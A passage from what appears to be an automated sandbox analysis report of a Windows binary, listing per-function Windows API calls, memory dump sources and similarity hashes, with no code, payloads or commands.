                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                    • String ID: NULL Pointer assignment
                                    • API String ID: 614568839-2785691316
                                    • Opcode ID: 1e4229607db868ee800d9769adc0372e3da80c8c5c6eb273cd18eb5d2d2ac511
                                    • Instruction ID: 5275f2b6829e067e8d3d8962f17135d2fcd5de4c4809c35acaccb12dc0fc1013
                                    • Opcode Fuzzy Hash: 1e4229607db868ee800d9769adc0372e3da80c8c5c6eb273cd18eb5d2d2ac511
                                    • Instruction Fuzzy Hash: F19106B1D4021DEFDF14EFA4CC95AEEB7B8FF48314F10816AE915A7291DB349A448B60
                                    APIs
                                    • GetMenu.USER32(?), ref: 00812183
                                    • GetMenuItemCount.USER32(00000000), ref: 008121B5
                                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 008121DD
                                    • _wcslen.LIBCMT ref: 00812213
                                    • GetMenuItemID.USER32(?,?), ref: 0081224D
                                    • GetSubMenu.USER32(?,?), ref: 0081225B
                                      • Part of subcall function 007E3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 007E3A57
                                      • Part of subcall function 007E3A3D: GetCurrentThreadId.KERNEL32 ref: 007E3A5E
                                      • Part of subcall function 007E3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,007E25B3), ref: 007E3A65
                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 008122E3
                                      • Part of subcall function 007EE97B: Sleep.KERNEL32 ref: 007EE9F3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                    • String ID:
                                    • API String ID: 4196846111-0
                                    • Opcode ID: 44b9b0ab5193f9b7f097d1745a7ef4b14a01948d2277ab0be6e8131e97c3ab93
                                    • Instruction ID: 689ea81d551e7111726bbdc9ff7a722008080b37ca56d6422dd9ec28c1239d0e
                                    • Opcode Fuzzy Hash: 44b9b0ab5193f9b7f097d1745a7ef4b14a01948d2277ab0be6e8131e97c3ab93
                                    • Instruction Fuzzy Hash: 57716C75A00215EFCB10EF68C845AEEB7F9FF88310F148459E916EB351DB38A9918B90
                                    APIs
                                    • IsWindow.USER32(010A7480), ref: 00817F37
                                    • IsWindowEnabled.USER32(010A7480), ref: 00817F43
                                    • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0081801E
                                    • SendMessageW.USER32(010A7480,000000B0,?,?), ref: 00818051
                                    • IsDlgButtonChecked.USER32(?,?), ref: 00818089
                                    • GetWindowLongW.USER32(010A7480,000000EC), ref: 008180AB
                                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 008180C3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                    • String ID:
                                    • API String ID: 4072528602-0
                                    • Opcode ID: 4702bfacc0bdc455a19023a084587ecc559852b7a4b4408bd81944521ec37649
                                    • Instruction ID: 1c657bca4759408cb6e4f74f934b7ca4b3e59e9a8934d5b009eed3a3036b12a1
                                    • Opcode Fuzzy Hash: 4702bfacc0bdc455a19023a084587ecc559852b7a4b4408bd81944521ec37649
                                    • Instruction Fuzzy Hash: 4C715774608208AFEB219F64C885FEBBBBDFF19300F14445DE946D7261CB31A986CB20
                                    APIs
                                    • GetParent.USER32(?), ref: 007EAEF9
                                    • GetKeyboardState.USER32(?), ref: 007EAF0E
                                    • SetKeyboardState.USER32(?), ref: 007EAF6F
                                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 007EAF9D
                                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 007EAFBC
                                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 007EAFFD
                                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 007EB020
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: MessagePost$KeyboardState$Parent
                                    • String ID:
                                    • API String ID: 87235514-0
                                    • Opcode ID: f1597f816f58380c1b96d7e784af9f70855907b2cc2e05ab4504a8fb49019ab1
                                    • Instruction ID: 7aa22f73f574c499394a8e3e0dd77226a48c7facf69957f0310909d27f281cf8
                                    • Opcode Fuzzy Hash: f1597f816f58380c1b96d7e784af9f70855907b2cc2e05ab4504a8fb49019ab1
                                    • Instruction Fuzzy Hash: 9751C0A06057D53DFB3683368849BBBBFA96F0A304F088489E1D9958D2C39CFC88D751
                                    APIs
                                    • GetParent.USER32(00000000), ref: 007EAD19
                                    • GetKeyboardState.USER32(?), ref: 007EAD2E
                                    • SetKeyboardState.USER32(?), ref: 007EAD8F
                                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 007EADBB
                                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 007EADD8
                                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 007EAE17
                                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 007EAE38
                                    Similarity
                                    • API ID: MessagePost$KeyboardState$Parent
                                    • String ID:
                                    • API String ID: 87235514-0
                                    • Opcode ID: 1cb104647d9d6696cdcd16982520fa383e48fca509877e9cc03430b47971fdd8
                                    • Instruction ID: adc7acb08ef5b820f4d22631e8e3f115c6716ad5ab32c174cf526fb9809fa888
                                    • Opcode Fuzzy Hash: 1cb104647d9d6696cdcd16982520fa383e48fca509877e9cc03430b47971fdd8
                                    • Instruction Fuzzy Hash: B851F7A16067D53DFB3383368C96BBA7F996F49304F088588E1D5468C2D29CFC88D752
                                    APIs
                                    • GetConsoleCP.KERNEL32(007C3CD6,?,?,?,?,?,?,?,?,007B5BA3,?,?,007C3CD6,?,?), ref: 007B5470
                                    • __fassign.LIBCMT ref: 007B54EB
                                    • __fassign.LIBCMT ref: 007B5506
                                    • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,007C3CD6,00000005,00000000,00000000), ref: 007B552C
                                    • WriteFile.KERNEL32(?,007C3CD6,00000000,007B5BA3,00000000,?,?,?,?,?,?,?,?,?,007B5BA3,?), ref: 007B554B
                                    • WriteFile.KERNEL32(?,?,00000001,007B5BA3,00000000,?,?,?,?,?,?,?,?,?,007B5BA3,?), ref: 007B5584
                                    Similarity
                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                    • String ID:
                                    • API String ID: 1324828854-0
                                    • Opcode ID: 1b80c0903db6dd2f87565dd62053ee164930b4b49b69011372abf3b8ca45c977
                                    • Instruction ID: 53b13f2e7400eb78163313d1d209b0e8c358d6b32777845fa1ae66b66eb38038
                                    • Opcode Fuzzy Hash: 1b80c0903db6dd2f87565dd62053ee164930b4b49b69011372abf3b8ca45c977
                                    • Instruction Fuzzy Hash: 9751D471A00649AFDB20CFA8D845BEEBBFAFF09301F14411AF555E7291E7349A51CB60
                                    APIs
                                      • Part of subcall function 0080304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0080307A
                                      • Part of subcall function 0080304E: _wcslen.LIBCMT ref: 0080309B
                                    • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00801112
                                    • WSAGetLastError.WSOCK32 ref: 00801121
                                    • WSAGetLastError.WSOCK32 ref: 008011C9
                                    • closesocket.WSOCK32(00000000), ref: 008011F9
                                    Similarity
                                    • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                    • String ID:
                                    • API String ID: 2675159561-0
                                    • Opcode ID: 85227fdc2a95695c820dda9afdd3aa9dba54ce964205486d62aa6f597f5f0b8a
                                    • Instruction ID: 6ca8544980cf945fddc0758077bf4f5a90e012537b4141d5bee1f3e3f09d7b24
                                    • Opcode Fuzzy Hash: 85227fdc2a95695c820dda9afdd3aa9dba54ce964205486d62aa6f597f5f0b8a
                                    • Instruction Fuzzy Hash: 5C41C032600204AFDB149F18CC89BAABBE9FF45328F148059F919DB2D1C774ED41CBA1
                                    APIs
                                      • Part of subcall function 007EDDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,007ECF22,?), ref: 007EDDFD
                                      • Part of subcall function 007EDDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,007ECF22,?), ref: 007EDE16
                                    • lstrcmpiW.KERNEL32(?,?), ref: 007ECF45
                                    • MoveFileW.KERNEL32(?,?), ref: 007ECF7F
                                    • _wcslen.LIBCMT ref: 007ED005
                                    • _wcslen.LIBCMT ref: 007ED01B
                                    • SHFileOperationW.SHELL32(?), ref: 007ED061
                                    Strings
                                    Similarity
                                    • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                    • String ID: \*.*
                                    • API String ID: 3164238972-1173974218
                                    • Opcode ID: f7f8c66531221d71fc64baaa5e68776b83e50f993155d84738a48cd35a955945
                                    • Instruction ID: 278577081bc1c1fd43f542f24d7c1e3aab4b6bd0e690b9b6c5abcb544d7691b3
                                    • Opcode Fuzzy Hash: f7f8c66531221d71fc64baaa5e68776b83e50f993155d84738a48cd35a955945
                                    • Instruction Fuzzy Hash: 2341987694615C9FDF12EBA4C985ADEB7BDAF4C340F0400E6E505EB141EB38AA85CB10
                                    APIs
                                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00812E1C
                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00812E4F
                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00812E84
                                    • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00812EB6
                                    • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00812EE0
                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00812EF1
                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00812F0B
                                    Similarity
                                    • API ID: LongWindow$MessageSend
                                    • String ID:
                                    • API String ID: 2178440468-0
                                    • Opcode ID: 146ee7bc5e507a9202fe1c02be85c95fdbd0ba511f10987387d28f5b0b15002e
                                    • Instruction ID: 8dfab8411189c04e446a0c68380b327bfe413c63dbbd799b714f7b2025220e00
                                    • Opcode Fuzzy Hash: 146ee7bc5e507a9202fe1c02be85c95fdbd0ba511f10987387d28f5b0b15002e
                                    • Instruction Fuzzy Hash: A8310270644250AFDF20CF58EC88FA53BA9FF9A711F1441A4F911CB2B2CB61ACA09B01
                                    APIs
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007E7769
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007E778F
                                    • SysAllocString.OLEAUT32(00000000), ref: 007E7792
                                    • SysAllocString.OLEAUT32(?), ref: 007E77B0
                                    • SysFreeString.OLEAUT32(?), ref: 007E77B9
                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 007E77DE
                                    • SysAllocString.OLEAUT32(?), ref: 007E77EC
                                    Similarity
                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                    • String ID:
                                    • API String ID: 3761583154-0
                                    • Opcode ID: ba0fdb40dd705e83eb77c9b03f7c3b7858fde8ea632d9f03111d505ae7c71a8d
                                    • Instruction ID: 64f9eaadcc63fdbd4201bc90d7415699ca6dc89116ed0db5c9679b77d115da00
                                    • Opcode Fuzzy Hash: ba0fdb40dd705e83eb77c9b03f7c3b7858fde8ea632d9f03111d505ae7c71a8d
                                    • Instruction Fuzzy Hash: 32219C76609219AFDB14DFA9DC88CBB73ACEF093647048025FA14DB150D6749C42C764
                                    APIs
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007E7842
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007E7868
                                    • SysAllocString.OLEAUT32(00000000), ref: 007E786B
                                    • SysAllocString.OLEAUT32 ref: 007E788C
                                    • SysFreeString.OLEAUT32 ref: 007E7895
                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 007E78AF
                                    • SysAllocString.OLEAUT32(?), ref: 007E78BD
                                    Similarity
                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                    • String ID:
                                    • API String ID: 3761583154-0
                                    • Opcode ID: e54780f406212fdc2b937bdd18e822ac041c68f2780a1538b7180799a516da30
                                    • Instruction ID: 02582f0f4bb722d8d1b84bd6d2f40a7ed9a0641777563f2c6b92b305a2c8ff10
                                    • Opcode Fuzzy Hash: e54780f406212fdc2b937bdd18e822ac041c68f2780a1538b7180799a516da30
                                    • Instruction Fuzzy Hash: 1021BD31609214AFEB14AFA9DC8CDAA77ACFF1C3607108025F914CB2A0DA78DC41CB64
                                    APIs
                                    • GetStdHandle.KERNEL32(0000000C), ref: 007F04F2
                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 007F052E
                                    Strings
                                    Similarity
                                    • API ID: CreateHandlePipe
                                    • String ID: nul
                                    • API String ID: 1424370930-2873401336
                                    • Opcode ID: 9794cb5ecb67f92ead9d0f998c327c6df8672fff195e7855f1b9c823b82f81c5
                                    • Instruction ID: e9afd7b483537bcd462f654a7e8d4d11be01d07e19762ac65a885e6fabc47419
                                    • Opcode Fuzzy Hash: 9794cb5ecb67f92ead9d0f998c327c6df8672fff195e7855f1b9c823b82f81c5
                                    • Instruction Fuzzy Hash: F1218271500309ABDF208F29DC08EAA77A8BF45724F204A19F9A1D73E1D7B4D960CFA0
                                    APIs
                                    • GetStdHandle.KERNEL32(000000F6), ref: 007F05C6
                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 007F0601
                                    Strings
                                    Similarity
                                    • API ID: CreateHandlePipe
                                    • String ID: nul
                                    • API String ID: 1424370930-2873401336
                                    • Opcode ID: 7e9fc292ca011dcd8e78e40aea033f363900438094a9677c33b715d013d40458
                                    • Instruction ID: 2244aad334c30d78dc12b157e4fb536aa3f7035593693d409e73015f9217d7b9
                                    • Opcode Fuzzy Hash: 7e9fc292ca011dcd8e78e40aea033f363900438094a9677c33b715d013d40458
                                    • Instruction Fuzzy Hash: D921A375500319DBDB208F689C08AAA77E8BF85720F204A19FAA1E73D1D7B49860CB90
                                    APIs
                                      • Part of subcall function 0078600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0078604C
                                      • Part of subcall function 0078600E: GetStockObject.GDI32(00000011), ref: 00786060
                                      • Part of subcall function 0078600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0078606A
                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00814112
                                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0081411F
                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0081412A
                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00814139
                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00814145
                                    Strings
                                    Similarity
                                    • API ID: MessageSend$CreateObjectStockWindow
                                    • String ID: Msctls_Progress32
                                    • API String ID: 1025951953-3636473452
                                    • Opcode ID: b14d3f01945f3c4136f425a738f7c61cf892f23a0c6ebfa072eb0206798c499b
                                    • Instruction ID: 267e1b59f3495d09a0aa27f5c9a3c6819e101cc5b576e7e5b499d5e9c0427db6
                                    • Opcode Fuzzy Hash: b14d3f01945f3c4136f425a738f7c61cf892f23a0c6ebfa072eb0206798c499b
                                    • Instruction Fuzzy Hash: 481190B214021DBEEF119E64CC86EE77F5DFF09798F004110BA18E6150C6769C619BA4
                                    APIs
                                      • Part of subcall function 007BD7A3: _free.LIBCMT ref: 007BD7CC
                                    • _free.LIBCMT ref: 007BD82D
                                      • Part of subcall function 007B29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,007BD7D1,00000000,00000000,00000000,00000000,?,007BD7F8,00000000,00000007,00000000,?,007BDBF5,00000000), ref: 007B29DE
                                      • Part of subcall function 007B29C8: GetLastError.KERNEL32(00000000,?,007BD7D1,00000000,00000000,00000000,00000000,?,007BD7F8,00000000,00000007,00000000,?,007BDBF5,00000000,00000000), ref: 007B29F0
                                    • _free.LIBCMT ref: 007BD838
                                    • _free.LIBCMT ref: 007BD843
                                    • _free.LIBCMT ref: 007BD897
                                    • _free.LIBCMT ref: 007BD8A2
                                    • _free.LIBCMT ref: 007BD8AD
                                    • _free.LIBCMT ref: 007BD8B8
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: 2933ec371357d85e0939af21d8d0365b0e51011a77ef7c4dc3c45f1a05a36567
                                    • Instruction ID: 841e325f6b5f1eadc95d699a3bfb69d74f33f5ca3c2afb7d175ac7d68de36eb8
                                    • Opcode Fuzzy Hash: 2933ec371357d85e0939af21d8d0365b0e51011a77ef7c4dc3c45f1a05a36567
                                    • Instruction Fuzzy Hash: 5A11C971541B04FAD631BFB0CC4AFCB7B9CAF05700F404C25F29DA65A2EA69B9068A60
                                    APIs
                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 007EDA74
                                    • LoadStringW.USER32(00000000), ref: 007EDA7B
                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 007EDA91
                                    • LoadStringW.USER32(00000000), ref: 007EDA98
                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 007EDADC
                                    Strings
                                    • %s (%d) : ==> %s: %s %s, xrefs: 007EDAB9
                                    Similarity
                                    • API ID: HandleLoadModuleString$Message
                                    • String ID: %s (%d) : ==> %s: %s %s
                                    • API String ID: 4072794657-3128320259
                                    • Opcode ID: 183f704fe9aa9eab6bd81c38ef9180708f790ca409dc23d7ff45d9945836fa06
                                    • Instruction ID: 27ba59bad2b226bf54f94e6129073f4bb8723724d59a83a8b5776d5b2633d648
                                    • Opcode Fuzzy Hash: 183f704fe9aa9eab6bd81c38ef9180708f790ca409dc23d7ff45d9945836fa06
                                    • Instruction Fuzzy Hash: 780186F65402087FE7109BE49D89EE7376CFB08301F4084A5B706E2041E6749E844F74
                                    APIs
                                    • InterlockedExchange.KERNEL32(010A0788,010A0788), ref: 007F097B
                                    • EnterCriticalSection.KERNEL32(010A0768,00000000), ref: 007F098D
                                    • TerminateThread.KERNEL32(00000000,000001F6), ref: 007F099B
                                    • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 007F09A9
                                    • CloseHandle.KERNEL32(00000000), ref: 007F09B8
                                    • InterlockedExchange.KERNEL32(010A0788,000001F6), ref: 007F09C8
                                    • LeaveCriticalSection.KERNEL32(010A0768), ref: 007F09CF
                                    Similarity
                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                    • String ID:
                                    • API String ID: 3495660284-0
                                    • Opcode ID: d56f7feab59e7455618c527127b6a966bae2d0eb0101051084d666cc26c6635d
                                    • Instruction ID: 887438025557425247d5aa49be9ed7be2613f805d265e52533d2c8726e009fd9
                                    • Opcode Fuzzy Hash: d56f7feab59e7455618c527127b6a966bae2d0eb0101051084d666cc26c6635d
                                    • Instruction Fuzzy Hash: 04F0E131482612BBD7515F94EE8DBE6BB39FF05702F405015F201909A1D779A565CF90
                                    APIs
                                    • GetClientRect.USER32(?,?), ref: 00785D30
                                    • GetWindowRect.USER32(?,?), ref: 00785D71
                                    • ScreenToClient.USER32(?,?), ref: 00785D99
                                    • GetClientRect.USER32(?,?), ref: 00785ED7
                                    • GetWindowRect.USER32(?,?), ref: 00785EF8
                                    Similarity
                                    • API ID: Rect$Client$Window$Screen
                                    • String ID:
                                    • API String ID: 1296646539-0
                                    • Opcode ID: 7783daff97155337041d64dd8fbcb5964ec2f9d65827153365ee0813fa44fc99
                                    • Instruction ID: 50489b4705d29233b2cf3c2048d6c5d9c557261f97cbabeb66e2a2c4d26a8024
                                    • Opcode Fuzzy Hash: 7783daff97155337041d64dd8fbcb5964ec2f9d65827153365ee0813fa44fc99
                                    • Instruction Fuzzy Hash: 77B16B34A0064ADBDB10DFA9C880BEEB7F1FF58310F14851EE8A9D7250DB38AA51DB54
                                    APIs
                                    • __allrem.LIBCMT ref: 007B00BA
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007B00D6
                                    • __allrem.LIBCMT ref: 007B00ED
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007B010B
                                    • __allrem.LIBCMT ref: 007B0122
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007B0140
                                    Similarity
                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                    • String ID:
                                    • API String ID: 1992179935-0
                                    • Opcode ID: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
                                    • Instruction ID: 32db0c706c80411eeb6a5854a076098ce3dbe91e71ce2936951de39ca9a15dd1
                                    • Opcode Fuzzy Hash: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
                                    • Instruction Fuzzy Hash: 2E81F776A0170ADFE724AE68CC45BAF73E9AF82364F24423EF551D7681E778D9008790
                                    APIs
                                      • Part of subcall function 00803149: select.WSOCK32(00000000,?,00000000,00000000,?,?,?,00000000,?,?,?,0080101C,00000000,?,?,00000000), ref: 00803195
                                    • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00801DC0
                                    • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00801DE1
                                    • WSAGetLastError.WSOCK32 ref: 00801DF2
                                    • inet_ntoa.WSOCK32(?), ref: 00801E8C
                                    • htons.WSOCK32(?,?,?,?,?), ref: 00801EDB
                                    • _strlen.LIBCMT ref: 00801F35
                                      • Part of subcall function 007E39E8: _strlen.LIBCMT ref: 007E39F2
                                      • Part of subcall function 00786D9E: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000002,?,?,?,?,0079CF58,?,?,?), ref: 00786DBA
                                      • Part of subcall function 00786D9E: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,0079CF58,?,?,?), ref: 00786DED
                                    Similarity
                                    • API ID: ByteCharMultiWide_strlen$ErrorLasthtonsinet_ntoaselect
                                    • String ID:
                                    • API String ID: 1923757996-0
                                    • Opcode ID: 89d9e770c7b09d40f3d0e322fde2504c59fa502e117ec40522062625706ec662
                                    • Instruction ID: 175c17b2308d2b72da97d3baa746808a0fb9433b2ef71349529f1c809a84571f
                                    • Opcode Fuzzy Hash: 89d9e770c7b09d40f3d0e322fde2504c59fa502e117ec40522062625706ec662
                                    • Instruction Fuzzy Hash: 55A1C131204341AFDB64EB24C889E2A77A5FF85328F54894CF4569B2E2CB35ED41CB91
                                    APIs
                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,007A82D9,007A82D9,?,?,?,007B644F,00000001,00000001,8BE85006), ref: 007B6258
                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,007B644F,00000001,00000001,8BE85006,?,?,?), ref: 007B62DE
                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 007B63D8
                                    • __freea.LIBCMT ref: 007B63E5
                                      • Part of subcall function 007B3820: RtlAllocateHeap.NTDLL(00000000,?,00851444,?,0079FDF5,?,?,0078A976,00000010,00851440,007813FC,?,007813C6,?,00781129), ref: 007B3852
                                    • __freea.LIBCMT ref: 007B63EE
                                    • __freea.LIBCMT ref: 007B6413
                                    Similarity
                                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                                    • String ID:
                                    • API String ID: 1414292761-0
                                    • Opcode ID: d1deb8ad1ae42c791c4b084fa042a83c76ca175afb50d104b5dd4714ee1e4b8e
                                    • Instruction ID: f9fcff2417ee9573391ef6bd10c409b34b2cc67c64f1c63d7c5462712da7b1e0
                                    • Opcode Fuzzy Hash: d1deb8ad1ae42c791c4b084fa042a83c76ca175afb50d104b5dd4714ee1e4b8e
                                    • Instruction Fuzzy Hash: 28519D72A00216ABEB258F64DC85FEF7BAAEF44750B154629FA05D7140EB3CDC84C6A0
                                    APIs
                                      • Part of subcall function 00789CB3: _wcslen.LIBCMT ref: 00789CBD
                                      • Part of subcall function 0080C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0080B6AE,?,?), ref: 0080C9B5
                                      • Part of subcall function 0080C998: _wcslen.LIBCMT ref: 0080C9F1
                                      • Part of subcall function 0080C998: _wcslen.LIBCMT ref: 0080CA68
                                      • Part of subcall function 0080C998: _wcslen.LIBCMT ref: 0080CA9E
                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0080BCCA
                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0080BD25
                                    • RegCloseKey.ADVAPI32(00000000), ref: 0080BD6A
                                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0080BD99
                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0080BDF3
                                    • RegCloseKey.ADVAPI32(?), ref: 0080BDFF
                                    Similarity
                                    • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                    • String ID:
                                    • API String ID: 1120388591-0
                                    • Opcode ID: afdb905524af287cf2705e48ef2002650cc784b78cb2c9347caf063a5806a1bf
                                    • Instruction ID: 925dade60dded7fadbea1e40a458e35d166287c0fdcae37f10333a79c89223d1
                                    • Opcode Fuzzy Hash: afdb905524af287cf2705e48ef2002650cc784b78cb2c9347caf063a5806a1bf
                                    • Instruction Fuzzy Hash: CD81B030208241EFD754EF24C895E6ABBE5FF84308F14895DF5598B2A2DB31ED45CB92
                                    APIs
                                    • VariantInit.OLEAUT32(00000035), ref: 007DF7B9
                                    • SysAllocString.OLEAUT32(00000001), ref: 007DF860
                                    • VariantCopy.OLEAUT32(007DFA64,00000000), ref: 007DF889
                                    • VariantClear.OLEAUT32(007DFA64), ref: 007DF8AD
                                    • VariantCopy.OLEAUT32(007DFA64,00000000), ref: 007DF8B1
                                    • VariantClear.OLEAUT32(?), ref: 007DF8BB
                                    Similarity
                                    • API ID: Variant$ClearCopy$AllocInitString
                                    • String ID:
                                    • API String ID: 3859894641-0
                                    • Opcode ID: a32cf876c73a2d4e62d14c7cc5e220ae213c9103d95223acd977cc3220d63000
                                    • Instruction ID: 850f3c87886950dbb7be681bb3f7c9f655d8e6540e4612cec42e5d9cbfdbf21f
                                    • Opcode Fuzzy Hash: a32cf876c73a2d4e62d14c7cc5e220ae213c9103d95223acd977cc3220d63000
                                    • Instruction Fuzzy Hash: 3251B531A41310FACF10AB65D8A9B29B3B8EF45310F248467E907DF391DB789C40C796
                                    APIs
                                      • Part of subcall function 00787620: _wcslen.LIBCMT ref: 00787625
                                      • Part of subcall function 00786B57: _wcslen.LIBCMT ref: 00786B6A
                                    • GetOpenFileNameW.COMDLG32(00000058), ref: 007F94E5
                                    • _wcslen.LIBCMT ref: 007F9506
                                    • _wcslen.LIBCMT ref: 007F952D
                                    • GetSaveFileNameW.COMDLG32(00000058), ref: 007F9585
                                    Strings
                                    Similarity
                                    • API ID: _wcslen$FileName$OpenSave
